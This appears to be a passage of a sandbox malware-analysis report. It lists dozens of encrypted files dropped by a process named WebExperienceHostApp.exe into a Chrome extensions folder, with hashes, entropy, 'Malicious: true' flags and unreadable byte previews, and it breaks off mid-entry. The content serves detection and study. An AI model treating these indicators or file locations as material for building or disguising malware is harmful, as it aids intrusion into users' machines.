SHA-512:	E2482AE0BB95261387E696D9B007BBC956F9BBF6BB79388143A89778D387FAA9CFD3309DFEB80AAFE32EC8E7B3D0417F9CCB161B4314CF5ED821AEDF1FFE799E
Malicious:	true
Preview:	."h.....(h..".....iiR...........:..N.=V(Z.t..dS...y..cw...L.b.x.;DGk....&..&....I...#.+.K..PB.)s..\.B..A.[fa-F...CrC3...E..ps5.)./.k..Wo..V.....b...$....z.X.=%]..c.....<...9....;.C./....`.f..L. _......... }=\I..\|,H.,.........s(..DK.2.-.[...J..Vd.....4..0.:....!....k..f..(t..+..O.wl.7....y...5.GWJp/.>..\|..};..w..C[k@...........02..jt....b!..MtU.......3........a....q%_..s...;D,.[7..A[-.(\IB~.+.\..\|...........R.i....@.I.)...`...E..g...9......".$".Z.b}..:E.=.+ze......S.p5.../.\|........cC...X....<...S HH....9G..U2..r..1..e....}.g.P......p..u"...F.........d..E>+U..g.\|.....-.K....".+O..C..d..xr..................R./ix.z.I~jRrTn....Hz7>..:.i ..Q...$T...X.].D?......d....K.he....N....&...tD.N3.Jj.C=..A=..?".=..c.m..e...!#..[.{.a.m.~....^...G'C.on.c.M...$4?6_...k.k.0..#F.B...W.R...{.GJ/._.In'Y#...z..E5vm.B........N..y.>.....-]...2QW.dH..5L....;..J.ZP%UxW!n7z..).\xi..H.U......I8.......7t....l.+.yDr......Q..`R%7.r.d..}._...P..E.g..I....D{Wvd..I).

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.86

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	86805
Entropy (8bit):	7.997904103001202
Encrypted:	true
SSDEEP:	1536:aV/Ff4ExhI6jiD4MeXZdOY2R4QZAZz9JRIHFt+PvmNd511wHg0w:qFf4qHjVdOESAZz9J6tovwLDP
MD5:	22C3A8BB3F94A4C21EE985A6FC23FA50
SHA1:	46DD8FEE82281B00178561C101A8F782F828ABE8
SHA-256:	AFAC25E01A51ABC1CB4D84D6366E773C2F20F51198AE7208ED2A668FF52045ED
SHA-512:	C1047ACFCDB567958D06F2807DBAD5192A6F6053F85F67D32CC73A6960D5C0DB4D49550403FB63EB9EE396A244B46F4BEA11D6C6AA699B179F023B3CB325F763
Malicious:	true
Preview:	.m.@.........!...&z.XIU.~.....\|...m..%b.djc.....xC....Bz.{w..]n......;qB/.e.Mn^.4...z...h..c5.aB.{.Q3.$. l<h..G.y`.k..1C......Z=5.C0..l...k..!.%.+..k.LxK8...d.z....P.'..r.....).....l...6..p......P........i..;.\...r..Z..O.d.Z......3...P....c{..#....}w.Z.u.M...Q.!...{....B.....&.Z.+Z..J.p.R.&g2..!<........UxG....!.'.....p...X.,....)N.......Q.CMS....:......._:.....k....$.z.3..m.[Al...OD../........t;..........-..^..b.yM......X..Sy.w.;.6M.5.......fM&c.....$vPT.l.............EE.5..../.8....;e.....7...l..{/..e..wb.54z.B8\w.%.].V..q.N.o.\|..,.xYlhT.'_.K.p).Hn..2C.....0...3..g.y..3....O.FL.G.F@a......;].~.T..:.......jx.\.-.....?M.......Q.......<.....?..^0)..2.p..n..-.]......]..L.6.h3.K.S`'/X...sO.p..Q....T.f3. ;.._..V..T..0i..a..\.A.Y....E......{E.....U.........k\|.P..MF.;\|.A.Y.(...U..'^T.........Hn.........U.[6..`?]..?....@.\|.O.>..d.b.....u...\...T.r...'..W..!..m....@1{.<.H..A........p......q...mn.pAY.F(;b#....B\|\|.f...1.~.DX..............C.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.87

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	94575
Entropy (8bit):	7.9977207538456065
Encrypted:	true
SSDEEP:	1536:yDJZaWA/FVGS7WTEYK1Nz0T2eTbvE6TXYhDXDNEcfsPcHPKTsbpdHc50YPlgM6JK:SJZapFAoJXET2eTbvxI5vsP5gplcHdsK
MD5:	CD0D394C2541D93A5FF9651E29B418EA
SHA1:	8A957D76714B485E751AE04DE7D741067986CF0D
SHA-256:	FAA6264780990444CE118C91A60FAED90326444333E29224A223384E4A114AB3
SHA-512:	DF1A28F8B18F7F49F119488325E6F39F7909B630CF6A9D20ED85EA5A7F385F7773A2E5C9D1C83800B68BDDE3C37CAA00FE6206B83FF7BF0B6E01E81D30D729D7
Malicious:	true
Preview:	..}.m_.c...'..sJ...BE?..q.x......\..~....%.Y..%..pDN..."....,........g.V...".C....&..s:.s.......m....u...8.<w...q.U....m.V.#./.......:^.......N..a.[.z.i..>.i.#.A.74.D4........-.u.;....9<U...... ...fF^......=M.B..xS...F...f..+..{.. I.sx....h.\s`....i.W...]v....VL7.......b............H....fsCn.#=..q...C....mvX....6..R..{..S0=....P...g.......&....{.KOld...;60N\8r.b........)I.e9"k.,~w .....r-x...k../...f.,.....x.......8w.K..2sf...j.{......Gue...%9.......w.tR..,jjb.agk..0....IX%/...9y..4.e.v\|i..m..+^j.....~.[=.C....f..}...........9.G.......k.\|".Z.it.`......I.Q.4..D.e.G^.0G....H.....F....<...p....0.../...kO.M.e.j.".P<:..g./....3.<....1..I..$. ..?.ZXP.^...9_.@.+......+...(.xY...:...R.2..d..&...5.L.....r..T.\.....C..."X..N.73.g.i(...54.F..,H(Y.7..gw.Qk......M..z.z(.3G...'....Z......^.lq.6.D..s...$...=...N.V50.....94 .....l.....c.....i..P....7.W...8.u....%V...s.:`...A./...."j....p.W.M....'....Z....-.....x..._..$..".z.@f..Gav..MTL.v....L.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.88

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	30090
Entropy (8bit):	7.992994224587034
Encrypted:	true
SSDEEP:	768:atLQILl8MIZcfii/4czvoyposUaz5u+1x:atLh2K9/4czRpxUazg+H
MD5:	DF4ACFEDC75F132012DAA6F6BB41947F
SHA1:	9F9FCCB55311FD4BB0FFAD4E77038222975D2C61
SHA-256:	724CD78929DAD83B3E2CA0FC1795E7B347D1A7547854F1691E18F61A333EB596
SHA-512:	4AA1103F3E209D5BF4C579CD64CDB690EBDBFD83A722AED84698286389686DF580F2FB2C3DEA85477B78230F34941D2C8EB8B17B91853EA455D4003FDCC1FC86
Malicious:	true
Preview:	r.K....t8.....=.`........,.....#.-....(.v8+o..4......Tm..[.'=K.=.Y.....[?i...:W.E9Q...B....($. ..t.."...'....wb...B.E...:a.\|......=...3q.OA.t......t^..=...u./y.\.p\N.!..V..XY.#.M`..O.(........6..)p.6>'..^S.....I...\.2....\.L1l.....7..y>.V#.]b$O.....P.d.2...)..A.r..\..Tz......0........C>\.5....+.5./.e........+.#.n...9.)....$O..I..5..K..~......Z)...mL...}.rx..8.....=...]<.......sfkKc.5.1rc9.B..B..~g...a>..:s.B\|.zU.9..[NJ2^.\|...%..;.u@..5.A..n.+n..q...s.(<.1q...F.K....w.Z:..u..jD.......K...)...1G....c%sz.......$/.2.L..n..B>..&..^.....Xp.q..].N.tM.fm..n...[K=.S.../".=b.&..w~@...,v..-H..6..+......-.h........:\|.?&......c....l(H.lP......z...x..Q\|R.u_.&......O....MrX...?.@..%.]\|5..H....Y.....m.#@T.2\|.0.o.7.9.,X.e.%.h..!5.H...<.vw.<)..;...B..X....a.%..9_$(b"....3Y..m. .....Y...v.e....Cm.O..P.....@.D.0m.+.T4...5...l....p..U.X@...U...g.........A3s...YM_.eu}km....{...B....u.GcN..:fB/..".>.$..J...o..e.}.koM..p.b....Fb.....82.4.".O..B^.G

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.89

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100848
Entropy (8bit):	7.998369976636654
Encrypted:	true
SSDEEP:	1536:m7KhBLzfCjzS2FpX6XhaUM+fvZRVczMtoYiaQ6FDExNPdjmgCvrpcIfVUBP:mm3+3zpX4snSV2MyYiF6NKOdjpccVqP
MD5:	AFAEAB53E11D67FB43EEA65E3CB82FCA
SHA1:	102FD30B94F1072E3F0C7D73E76F258E1F2A0001
SHA-256:	227CD283ECFEAD810EC11E444E571C8058568671E2A3D260C963F31B09D5D7A1
SHA-512:	D88AE8F2B69F210D7D6FB230A2692463D23424962F8BB20E49124F5D5E3A9D7E7005AD04B712F4EFDBAE1AA806A7DDB9BDDF595D923637C8B3938209D9C4580F
Malicious:	true
Preview:	..).........\...FR.KM...E.....A.X..j"..Q.... .....ncx.....b".f..nek..G...Q.....C.j\..p.p.{..+..D....$.....<.Mj.;.}.u..-..D.".....K.u.Rj...h\|/zA..[B...[".hf.m....T.N........;.V[V._%..t..<#.rE'..h}..&E_jb[...'.'.........5o..W+.+...;N./.d8..yC..+.r.......5.N.J+.x6x..L....o.A...1x.....p.V.9..N..5.....x3.%.g.}.....D.z....R....6...l.....h..2.o6'...S.....7.....O.....g........BNK...p.....J.<1\|...U..F.C..nBJn.s..:`..+~f.......9h...{...(..>.yMv......./o.Rk.....\|:D....:m..3.6.gD.^.b?.9.B.A.J....]:.f...z;..J.W3..Yw^. ...":.H?u.:.<.J<.T....?.\|]...h..a.\|^.z{7J&.h...K..4..n%.s.{..#.RE..'.Cp..r 6.^..Y."../.....fca.Yb.%....f.`.a2...P..d...X..W...A.1nG.a..c...^f.+:.@.HY`.ass}...)1.....tFX....>...8.^.RdI..."#.]D...lW..C.7.-.?._..%@...)<9...(N?J.u.r/:\..]h....$:QL^L].Dz...q....z...1....\|0h.UiL..~j{..."i.2..r......V..aK.wj.b...(~?.r.Vm.%]_..]V......$O./.-!.... ....ty....<M.N.zF...eh.....pu)s?..Syc...4>../D.....N.....1.{0..\..{.&d$...Q.g..(.eR.....X._7........\|m

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.9

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	108428
Entropy (8bit):	7.998127695945678
Encrypted:	true
SSDEEP:	3072:NnvyPCeFLI9z/1n9n+YlOazl82sL2ZNTYsfd:gCemnn9+YoUl8baZNTYsfd
MD5:	38F750CA8823977655F9BD61F0D1E405
SHA1:	2191FA88948D734A364A295F1A085ADE66CA9B58
SHA-256:	9F0C95336E7C78312FC24E0A89F1E21F73317D2237875806F4EC354525444804
SHA-512:	ED024D1277CA23079C92530A130FF99A49D41043AEE1F60CAAD2EA9F3F73EF55A240CFC90A0F3EC0CB1941D669C543DC9D84ADC2238F73A146CE84312227A078
Malicious:	true
Preview:	.o:l..T^.w..&...O..,0o.............)k..S.XY....w...7~...3.....b.i...."0/..TR#"t.r.<.wZ..T...;......U..x.w.k!..2..1....)....G.d......>.....k..RNk..p....>.I.9a.2n...6.'..4....t.{/f.-..;G...yJ..\Z:.A.]..~\.E.i.Q.5tc..!.....+.M>%.P`.f.:m.UGHFA..z.....6..UJ3..a...'O#..;%...e..A~L..J0K.J...l`lr.t/m....@A.9..G.3R.m6z+.E....~.... .a..y....s..G......K......A...G)..o...UYE.r...5!Y..y1..S..a..Ao@u.(.............5XN.3P...w..r..>...a.[.V.Jd.D6...]x.'.j5-%..Z..\%.......jn.N....4...W.d,...Nx..u..]t+.>.gnB.n$b....M.0?`...!.1.z..i..w.)........: ...>.......G.U....w...z.E......4I'z.....\|..6.....J.;..1..`,..?.......YX..I./._.:l.............!......7Qf.d.`.4~.......I...2wE.A5.]......<~r...5.?...y.w.I.0...q..<?"+..4.~...<-7..0..d.(.aZ.....^f.!O.2...Bk..E..,.3.C"h....Ck.-.(".....C.&...N.3......J..:@F....Y..l.=........%.n:.\|...w....t.....d.m.A..........J!.].=.uO~............qIf...%bA..J.z....M.]......D.u 3oU$.....h....3......jv...-.U.=..G7.rr.......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.90

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	SysEx File -
Category:	dropped
Size (bytes):	33069
Entropy (8bit):	7.993925773002762
Encrypted:	true
SSDEEP:	768:pyxDdv06jbLxo+fkAAVxxHheaSFs1781Ns0qU3PMra+iw4:pyxnjPxLfkN6O78XsJaP5w4
MD5:	58E78B76FA5A84F006B2F933F6A83FE5
SHA1:	C3752AD73B82D2F9E5345060C3FD158B8BD1719C
SHA-256:	151B5549D182DA650EB17240295977BDD4EA1FCEC932A0790562D981617F0D00
SHA-512:	9F73BABA449ACFAE73F86C0F3F28B08D31CB285439CACC1F29164672C5E4DA0867356F2908C3FE38D67F61C2A25D4A6C906ED78D173D189700C7FA17507E10D7
Malicious:	true
Preview:	.U..s...'.c......j6.g..;#...}.X. ...(.......K..Pj.Ox....\|.....KX.).e...d&..$..v.I8.oi.1..MD...p....:..4H{....../.q.....-l.u.3..\......6...d....0..IA..L.........-..V.V...x..."....TI..n,.0J1;.y.T`..#.gX..S.E!.9.......~.<-.8a$.;T'.I........:9#X...H..K7&.8.4....w..h..h.[].k............C.L......@"...;w}...O'.w..]YF.1......@\$.YK.QA.G..`...5xO......]...rK{^.D.;.........m..}..2...a_...9`-`.s=.X`.wS..EW....l......<...^....H.......'<.%.....\yhB.'...S...&..X....c.#w.....5N[..;).P..M...{...4.U.9..:..2.4...g............}..'..~Y.vc.Z...~.k4....;.r..h..!.6....x.....a..q........l.....+>.-..~D/.!>.L...?.+.l...\|%...D..#..k...0....gj..:.!.+..z..?H.....\|...6l?..n.M.yI.{NK..:ZW.L^8.=.h...g.....J.F....?yB.oM....H.un.U5....r.P.#i...,......].J`....b..<........m.............._..K.s;..U.l....~.5?.......#..;..x....D!4@...x..hg.iF4]wg.4;.vt.;\|..P'g....9~.:........b.Wk..hl.Z...}G..d-..:....Tz.dL0aA..C..!.....E...W<....n...=.h...;m.~..7"..a.0.uzu....._...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.91

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	54007
Entropy (8bit):	7.996688250578679
Encrypted:	true
SSDEEP:	1536:4tly2UfwKToAZoNUB86cxCFPfNRYBDOIF0VHvg1PLdLaic:WUfwKTfoNc86cgpYBDQVcPLd6
MD5:	89E443702267165FBAE87AF26C939C18
SHA1:	5029D14361733424BE9F6A6E1B6F2BB57653ACF9
SHA-256:	23F0FD815D5A569779089212EDF6060C4326D15F589A5BC25136BA192BAC3A84
SHA-512:	E5F9A8C8E00847AB66A72F1530CBF8964EE1F94FD6A8114B8D9F0504404162CAFBB67BDE3F393F9B8B4C4CFA5A690E8C52E4BF9245F3F70FAB99B9D6789E60A1
Malicious:	true
Preview:	1+...+y.=b.;....-Y..F..Kz(.D".DBt...s.$.v.j....#{.....4)\1>N^..e...UgNF.p.....TX.>.=....-...1z...+..1..rv.].K..~.R=k...?_m...^O.......%.:....,5j..\|..U6.....$..V.u..y...hG.x..y-.[oX.\.....<..z.YUkUUI&.k...)(J..e....G..E.#.(k.5...se.....J..4P~."..@..f.....>........{......./D./.).......>.,....=.J..Yh3..r..%.nY"..X.V.....\|h!...w..=.{e....#....ltj..tK..St.%.L.P.3.8a......S?_5...6....&.y9..Ac..9.....C..v...^....!.o2B..c..5>H.8.D.a.u......Y._+.\....V....@0L3...f.H..!.i.nso..\...u.......g."_L&RT.._SLB_..c..Y2...=O4...b..80.Ud...Ds..S.q1EuB_.{..y.,....@.iq!..3\.V..Zw....../.}6Q...}n.......$........e...u...j.U....;Ao.d.o..Aeo-.q...e......s.s....7\K=........N.ggf/.0.7.D{y...b,..y.,.hB.>..&.l.....vC{h.iP.M3w..D>....S.j..o.^<b...Yb^..x~.ox.pWb..Y./c..,J..~..B..j....n..B;y..>..w..:J.HM.....a...X%.~7.d..xi.(....:.Hp....^c.n..Y%Vd.....?....Ef..Z....{..r....,/T...3O...k...dy.C9[[..)3.Z ..8...C...:...@.]hJ?@.".<..2.?*!.[../..Z6...'F..QE'....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.92

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	101889
Entropy (8bit):	7.998101540203829
Encrypted:	true
SSDEEP:	3072:F+k1vLojmdohZdLA4ynukBMk9yu+gl2SaV:F/9Whcak9yu+2xaV
MD5:	F798328E8E146EE0F21494DFED694087
SHA1:	9259DC61933E9DE1C0D8586E632FD7C504DE5AF9
SHA-256:	7BD6D8C54EE016BD3B543F1B960AD63544E0223FFE1472BD7533E05C3EF8F4C9
SHA-512:	F85F4EEA09A19AF2E25257119B8D91373F55D891D4BEA002C48EDAA5660895DA631F84EF45B5CD5430196B1606DF6782F34433A8D9F3D2244D78EBF682AE307F
Malicious:	true
Preview:	...,v....,....h$.e.J".....f......l.<.Z..9E.~F..Dk.4.O=..M.....[K(.m..yS.\....L.j>~.@...B..........o..8..f......r\|pc.......!..OP.b..n...y.-t..8..90.......W..^.s..H.fL.V+4?Z^..........].4u{2W.zG.M.(... y.....Hyw9n>.2JN.t...D}U.b.^..z.....r(...j2...('.,b.{.V{....t.4]r..(........>.\.H.......A.G. ..}-...o-..\...Qso..d..Np...Z"..Uq..j.g.L...J..h..'..C(.E..^.c$...E..>..K'$U....j`k.6Pn4...S./[.........^hVZ....2..P{..03.Vij.(..f[....%&....6.....%..i&. .....}.f.\|....,.-._.....(\|.....u..+)...........+g..l.....i......[.^....nbe.Y.>...'.....l4.7.E."U.S9 L...L.HU8.w.s..yf......n...2S.IE...R.i,...a..O..c.^_)@N.....C\|d{.[..$>.."...!.Z%....#.,+)q.0.U....@6...y.a..Vywl.../.S...j............\|b..&#.V..8............2Zf..tE.Fx...J..C..Z.+.....H........cVT..8f.....G j.[..L.#H..+T...85...)....l%R,.}.X.*./7.([..2?BQ...5@.n.D;..Y........s...)1..W..A...#...UV...<.[-..S.Q^xJ.g.3u._F6...........;8....u'...@.6...F[.....#.......P.Y.e..A....i..].....E..<./

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.93

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	36160
Entropy (8bit):	7.99479992522762
Encrypted:	true
SSDEEP:	768:zgNu58OFEQqW0znq7mgQgQNNtATfIidF96DFes+oreMBR7:zgN3OaQgznhCff6kqrhR7
MD5:	217C230519DF70F807C75FB7A05083E2
SHA1:	5628299890E30BAC625A08A47F3F8AD6011CA394
SHA-256:	E2C1D1DB42BCB737B7E9F628CA095783949002A77A0ABB4318E0C020CC0C6B20
SHA-512:	D09A8606BFCF473D7305947D3142F145F29AAB2A3798915017510A708EDBF314394D415A0E8B54ECCE799B5C335254CAD16AE3280286C7342764B215BCF484CA
Malicious:	true
Preview:	.....M.&....{.up....P.L.n....6B.[.....]....V..P\|.W.F..,.3....#......1.!6!.].P@....R.m.F0,.;%.i][.qI..B.....].}r...:....J..u.2.]9H.=T.$H:.........L.....x......h1.t'M..Q[......b^.{.0M....4.&.v...c\tR.F......d...y/../..;.PE.r..:.X}..tc....0N..V..RqZ...w}.z.i...c..d9.0K.L........+....3p..4......l...K.gC.p..z.S.o......R.M..~/S.<$a(/F.l.T..T.?`.B<.........X.u......S.S........[.a@...n.....,....(e....$....+H........g...f..._....1.....f.....]..w...!}w..#.....m0fk..'R........r.-.m...h}..>.b.vx.NX0...gK..!...\......L...jn;..&L.....j..<e.S.MG{M...........j.}.Y.=..Ne....bV.V....kx..VE..#<9...:<v.r./..RY...r\|i.....<........G..-.....`&H1..{....T;...S...5.e.....V.....t.?vSyG..P\.....?.q.....<o....fJ.d..47...5e-+~>.!d.+k..-..~..[.V....{..ZU....\...a.b...+.e..7...j......b.!.M3........A.b...O.Q4......#.].>..4.1.U.....0.P.m...).lCl&;rv..#..*..Z.;4xm..s..^{..w.c.o..w.A.).Zm@....@..>..B...X..J.".>p..M.'D.e.m.F.......J.Q..3.....[.+x.e...'.gd....Jx..B..+

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.94

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	106396
Entropy (8bit):	7.998067864727535
Encrypted:	true
SSDEEP:	3072:qM37hIVrxhOGOQQnmQ1ITmxzq0LayAixElw:J37YhOGOQAH1rxzl+yAixp
MD5:	6185A27AF47F65502F8D4C2B4BC1FA86
SHA1:	391B549D775674B084948D22C2F04D8A1A4710D3
SHA-256:	DBC6E143113C467818082DFA9E951F1371EE76371D27B601C34137138BF4D20B
SHA-512:	7612334D4F70D5E4225F1D083989A20B20B4C0DBE3FC99546E904D51A2743EA3DB6E1D748E5649D432163006F5008E01EAE2541ABF0C22F68C5834721C8B7E88
Malicious:	true
Preview:	...az...1E9.$:S....._+. ..z....VR.2U\.X.t.B..J..x.=.4....%...............O..T97.8@...9NM...........Bj,.)f!.u.g.<...o...&..SXU...'.d..f.Guy.6...?te+........).....D$....JWL...,..r...r...k."X....`H`.rq.i...<......iB.w.i...$...Z6.P.~$..dP..J.....b..qC.........._~Ug..KV...)H.\|.z_.(..y..a...'.....m...........r......{.l.n4.....Q.-t....c6.K...u...~...D..0......dC....h^@o...c.'s../.."...6..d..4...aN.\.p.:eK....#O...r4$Z.nuOG...C...2uKLl...!.......8.'...d....k.QT-.QD..._......k..4A.../'..)....L..N...$.w..f.Nm..GJ.N..q.\|N..w..W.F.j........(&.`^.m.F.5...m\..0...`..#gP....s.3...4.B..W..3....Z.\...h.Sr6.d>.>J..H..'.d.T..Pm.s....(.V..B.Z.._.6.yg".C.D'^..9~R...&g[.qN.............2B.._...J...<..vY=.4..]\...=K...&...rB./1C..A.t.o......G..mK.E.1.... !N.....!..W.I.u@......=...e!.!.+.@......q.V..9?.@...H...^.kc.'.<.F.7......Q...).[\.=.+*(.1.....]P...$...d.[Zru...J.tu.:+v.s.@.4..[.......Z..9..O.......qZS.f.;.,....5G.-.p....T.....C#..$#.0:....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.95

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	39593
Entropy (8bit):	7.995031825226503
Encrypted:	true
SSDEEP:	768:S/R/jO3pGVwBF20lNBVfwXIpNzBToHSfbu4SAvUN/pzSUx67//yFF:MRrO3KqBeKWSn7WF
MD5:	4B066D38DBCF6B34DAC79FDF1D8B61A2
SHA1:	83F441ABC5E495FD1086008DE529640F2C21F346
SHA-256:	3A76ECE7B42A78424B5E9866BB2820AF870622B8F9B5CD84711029126673BC08
SHA-512:	9099B67AE5A0CFE2235C440DFF4A72FC5D527374A8E558B00F2EA935401838073A4F9F7D6C7C6A5DE8C899993F35C3C8881E2C263A20332D036A3493B307730E
Malicious:	true
Preview:	M.......EO......R.....7.3Z.....j...,qZ.X....).'..>s......j...U....=@.@......i.."....?t...l...0K.Ma.<..}s....P{/..\|..._..T...;.._.{.@V..`~.v..l.....G....r.o.....s.;.&.D@.%Q%."../...<..n.$...o;{OO..C}..5..H...bw....6.7Q@.....Y......]t#.h8v..0.....M.}ei.3n...vK.....m.mT...\.v....k.......sp...mz....O..>.mfb.%.......<......d.Z...X.E...C....b..L.l..1..5.^..!q..6q......6.....}$..Q".....m...~.U...!k..%........6.v,..t.......Z..I9@B.q...u.j.b;....WP....Vo...IX.\|.........0.A.N.TIlm..@J7.?.N..6.+..x.n..l6...C;k~F.......V7.Lk....].....^__.va...aHd.j5/.8O?....X9..#.-q.v..E...z..........^..]D.}x....M.f......W..5X[..9.<,...QB.W.....Y..v.qM.(.L..p......y...O.....,s3q..-.[..%...'.EX.....<.`o..,...0.kK.:...._....'T..m........{.0Z..1..).P..MQ..O..(....p&2-k..`...z...L......5.\|.e...53E.....o.._6H_+...j.{..;.......U/3C..A.=.5 ...x..AO7fv.Y.\|......r..4N.E..\.d.....I.W..Bn../)^t..$.bBC..z!_v ...8....k.[+Q.e..]L.t3.......,.L..d..Jy4.....p..7......B

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.96

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	90014
Entropy (8bit):	7.998209516743823
Encrypted:	true
SSDEEP:	1536:qf6fRCL8yUFSwdbx/xsgwonwHSAnZEbn7T73l/hXASqURe4iJbA+7zx:zfMLfiSwv5wonOSASn7TTl5wKe4Izx
MD5:	35C1E7A53DD23C00ACCE2DA7FBB754D3
SHA1:	159A471D00F72014352CF1F40FECEBDEB1FAA5EB
SHA-256:	73F0DA73F1712849AA9878FE0C6442121350BA928632D7C20D99548740D58A55
SHA-512:	417C1F00399363F653B3B011317FDDB7BAD5238899EFB404699344B4AF484AA0F97F6BE2117CFE3ECC2BE2ADDD9DBF16837CA6D541D57653AE0AB10AF1991075
Malicious:	true
Preview:	....r=.B...u8..Q.b......Tv...l..e.J....%..T[....."...u.."..&\|yJ...,...a.N.Q.-..)...d.....,Q..z....u....p%..6.Ho...#O...g.c./..v..\ A.../....g...;_.......wE..b7h..x...P.>.~...Y.D...t.U.p.....h...W.......K.>mT...=_...q..\| .-...6s5....5........~jg...{..1-.wF4.B&7FO.......6%.....+..Y..;.....r.9....../..}..n...B>_...R?~.'{`.B.aT...2p\|..b.....ME........F.F..S...".-..V;...+.mr#..E....r..m....3.J....(O..+........3.yMG..\...........\|.gh..;.J....F.T...+Oz..w.......y...+.5...!....4ww.".l...:e;P..S...qY.~.A...c.[rNz..d..w.[.8.......U.>?=...1.=d.p..>2#.u.:..\.1...X..7.EUce.U_6z........./W%..}..K. ....O#..[....x.;"...........i....Kg..=t.k..K...j.L.....U(......$.rO.t..".7..5r..o.7.U\..&..,m.\|lH`...d/.0...V...Y.L...}.J..'...l1n...T.@h..?.i.uo[0G<...................B.pe..3..>]wZ..$.:.n!......K.........\..]..v..l.5......A.ydT5..`..M..Cpx..{.{..fr.........f.v....:...@pB.+...>L...I;:,)....?j....f.=l*..A....Si.U..UT..hD.$T.u..lR..f......Q$0".Z.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.97

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	32520
Entropy (8bit):	7.993661924408125
Encrypted:	true
SSDEEP:	768:FWmEF2vB3mkeGVFdd/s2WKI30gWG1hAbbbo4B2rTi2dwEVhVJ:22vB3mkeGVfFdTi0gSHog2S2eEbVJ
MD5:	DE65F5463326EEE43A9AB108DED94C53
SHA1:	F7BBE75610DC317D897040AC5DB4041B3C16BF36
SHA-256:	35BC57819FAD6E61CD0819EE5EEDB827251D83FEB23E809D2CD746A36C5ECEF7
SHA-512:	EDA61A322A4AEAB9138DE8FEF4BCA8E5ED5EAADF5C50573E05E15BE94EBA72179D225D4DC7606F6A8055C9942F05A8E1013B3F009C813DCAD33F5DC405895DFE
Malicious:	true
Preview:	C.,n..7.L+.'.....c./.. 8....\U....cc.a.v....3Z.!...w.DE.Jv.@.Z^l....`.J7?...E\|b).....(pG.......p......oD.~..l...h....^./.Ee'>.U-.$^0.Q......8.........s.8QJ..R;.g...............'..9.VG.....p...e.U.`.....(....m.\.x...o...N.X.T..zh.;....F..0..7f.N0..".....=Ua.pK5.g>c.gN..w.y....`...Ok.R.....L.'M._...I^.4.%{....gL......8..;A.../.E"..._.....:.0.1..L1.C.....-.....4........%...?....W=t.{\|!..~.a.G.....J._v.)..e....{/n....?m.%2......w.x=.4..D....Q..F..{F..r..W&Zm.8..bQ.....+.~.....lZ..WO.h.?.o..#.F.F.$..4...2.kz ....\|].v[0......iMX_\..T!..9........\|]..R.<c.B.Bn....N..N2...v?=(....&..p.S.<.........\|e.-t.I5w;~.h+x..p..=-y.si.9.?.....J.->l...].2..g...ia..M...`.Ac.....w..."........6...s.gF5..y..ks. .p.g.-..z,?....I.`.@..z..ht.....Q..."qRJ......f...G.O..x..y<.....S.........C..!...;.....g..Fz2.75../i.2..4[.\.q....'8Z.:\|5..]..Z.p.......zB.Gm.M.I`...7...7........C..;...S.(.......M9.....SJ^...K..C.k.M....V.uk..e..'...$.ZNi..yU4.4...^......h

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.98

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100966
Entropy (8bit):	7.998412085921912
Encrypted:	true
SSDEEP:	3072:lG5ZPA2Ei0Glgejn7T8TCuIO5p6H6+cRJXEo+RMdxBJ:UZPd10GfneCXO5YcX00d
MD5:	F55E7B7AF6071C10547C54D62204B475
SHA1:	E036BEF92DFF196F6423F7B0C094F634DCC0DEF7
SHA-256:	B862442376861EDA141DF226A952D35FB5E82AB127AD090C81EC46FF8CE33A0C
SHA-512:	544492FBC7B42B400C664B27033F3EF212C261290B857408258BDBB3C3DF6D0C01D8585D4D2BE6133E15B90096230EF289164BF025B1FE0B5A66452FAA28F4EF
Malicious:	true
